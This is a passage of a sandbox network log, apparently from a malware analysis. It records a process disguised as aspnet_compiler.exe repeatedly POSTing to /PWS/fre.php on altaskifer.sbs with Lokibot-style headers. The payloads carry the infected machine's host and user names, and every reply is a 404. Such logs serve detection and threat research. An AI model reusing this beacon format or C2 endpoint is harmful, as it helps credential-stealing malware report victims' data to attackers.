Apr 6, 2024 09:30:53.769378901 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:54.149101973 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUzBx%2BEpxHHepjHv07XDwi%2F2fUx%2FBJooZjHNEfYfcOte%2BGeXQyB8BhzAbjKiuxAYDBh9ocffKa1N1JvOCEocRMWYLDt1dmdyYNUzNYOpTabEeggAOA1Ed2FGLeD9DiegNA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700133daf0509ba-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.6	49836	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:54.422589064 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:54.546266079 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:54.946742058 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6g3KaMv5qima7%2BvG7GPiheKGX7wseQs6TNEmDXs6i67wFd91sMBEen2KHJx%2FK%2F9FdT59VwDbgKUb8Ld%2BKSr4zFGNrEFSj28orDFuNxFc0%2BdxN37sGrBlcX1Xf%2F3FkyrJ3w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013428e6f4c16-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.6	49837	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:55.220104933 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:55.344695091 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:55.725775957 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6uYNXHeHXbzoIRqn%2BcqvXLoxt6bdvjtWwATNwhNdcBD%2Bk0TtGyE6NXay20dMj6dDX%2FrdaeTNkFXMOVysyMCybf8E1i2fxfyOul0VBG5OQYytfz55dzBbFmYWMQ5YRa8vQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013478a825c6c-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.6	49838	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:55.998033047 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:56.121968031 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:56.498783112 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zl0%2Bmmr3ZrCtRr9useS9N6tkvQs8MSgzROXMwujLYU%2F%2BTN%2FpsPVA%2BtA6ctTfcN48jrdNc2egHZj01xirYTFGDL%2BlfhplrJ2P2bGlMpuJjYRSP3DiVO8Hpl8HxT3kCv3ILg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700134c6e7d742a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.6	49839	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:56.772335052 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:56.896739006 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:57.295444965 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CIpf%2Bnyl%2FqKHdOYLwBniygSqMfR4atIsMTfaD1YLU3Viom85R4Zy%2FXrtD6rAUx8eJMA3rrlXbbqCl1Mfc47VOZVxu9VrcAUhTO8nrZ5UZ5QW7OkT4M4XWzIzlRTSnm%2BISQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013513ea26c88-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.6	49840	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:57.593507051 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:57.717902899 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:58.094893932 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mtUaaRut9HMTDKTnqaOmT4FfLjjCk9Z8AFWsoll9msNC2ftTMRHVynCFgxZyUFvb0GsQVPkyoaZvebQLPH5wX62CZSa6gSlk%2BBzLPVVWfRMjhgMXurKuSuRuBwRDf9J2w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013565bf07441-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.6	49841	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:59.991734028 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:00.115890980 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:00.493268013 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XeIHdRYDGzWAM4lm%2FcDBR23ZIBR6Sc%2FFAeVdmeXd4R55B3Vw2Rqm3f81JfR1Wsk2Sf9cXzpmPa%2F3WPOw08C%2Bq8zG1rlXxXwTCiSMlWSA0%2BAClC2ZawN1gUls5OjFHlgnEg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013655b39748e-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.6	49842	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:00.769505024 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:00.893640995 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:01.281761885 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lHy%2BnWeke6DX4uCy3gxufoNGkIwFntcPnL0BC6QSPN%2Blu6eyrb%2FigTs3atNr2QkSPT4DY5I%2BcbFkTsURCtT1fvQORwzs4Ty1JMK%2BQliVp7k9FvsPjOfyPgHBctNI1Mwmog%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700136a3ab731da-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.6	49843	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:01.546958923 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:01.670955896 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:02.058294058 CEST	615	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WlVQEPP01w%2BHhl%2FIdbZdtvQ9PWlK2k1USYK5QJVY73qHD%2B2Mrm%2FDr0kfVnFI3y2qoZjN%2BV27ygjXrOjwbvT3%2FRCTlW4%2B5SWV7uHonlKj6%2Fg%2FXdmCT7m5lP%2BKJ8DLDoNfCQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700136f1c49961a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.6	49844	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:02.332844973 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:02.457158089 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:02.836838961 CEST	609	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=he0ktgepTM5aiMG%2F%2B8HVehak34wiMUfvZsS%2FXc51PpRRGO4vOz3GE%2FxsnxehKX94BPJIUurrc3NkzAfsKWJUmnNzZ4qNbWhonqn4%2BYpq9zGjQsCO4CUkGxWQ%2B4A%2BuCXtuw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001373fb3b0981-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.6	49845	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:03.119856119 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:03.244040012 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:03.618990898 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVwIgVtUbFiLawufMLwLmYKB6XV3oRTzqg%2BhoV9dAsC6YIUAhbEpzgKgzLn7Lam36juHnInS3M45iAYQoX1hkDxownRWPjMUg4C8sTtvw6JAcQyAmZrbyBZ375Hqqt4lzw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001378e835a566-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.6	49846	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:03.891736984 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:04.015881062 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:04.394763947 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ikrCw5e52moUqUbpsFXcakEEl%2B3LGkaAKbTb025ozQtPKquEBKh0XgUj0fX0hYGnGy%2BEHS8BMBjEm56TWnyRtEilrFK%2BxYJ4aMycgEJkr%2FM6pt5ul8Qyce%2FohK9h8h9gkw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700137dbfd28d9d-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.6	49847	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:04.659571886 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:04.784728050 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:05.165330887 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32P4zlhrYGaP0rvDKGdrPXwiSVAgBfCffSfTgJuMs3dAigo%2B4xZpRAPsgncVmu8ayV%2B%2BtQ96%2FNHq8pSf0SEbMufJKOPZh97mY3MyYwkSpYNs%2Bn%2FdXXRhgG60nfb1QrdtfA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013828ead0a32-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.6	49848	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:05.441891909 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:05.566822052 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:05.937047005 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkfBdYBCXOx5P6JOvOf0jDTNu1%2FsBOl6UbSQPYkYcdnLClcrBQozTcZfvLcOT3c8HF2pRCaCosNoGI5e90dOmmgBFRhIdU%2FH2wwRVzJtwq0RVBNccZ%2BP2jECULNN1nt0ag%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013876ecf288a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.6	49849	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:06.206379890 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:06.331012964 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:06.734194040 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=caNV5JMwxkvlHrncxe3uP7JgXeIIpfU8qK3z6lmdkHsqsbdF2XkXIMTnVQ7aQxkL6rk%2FJQEG%2BkU%2FT1qw4PuZv1jsl4IzKJzRy0QyYLHN6Q8J2e2waH78%2FclJofQA1Fv1HQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700138c28d1742a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.6	49850	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:06.999341011 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
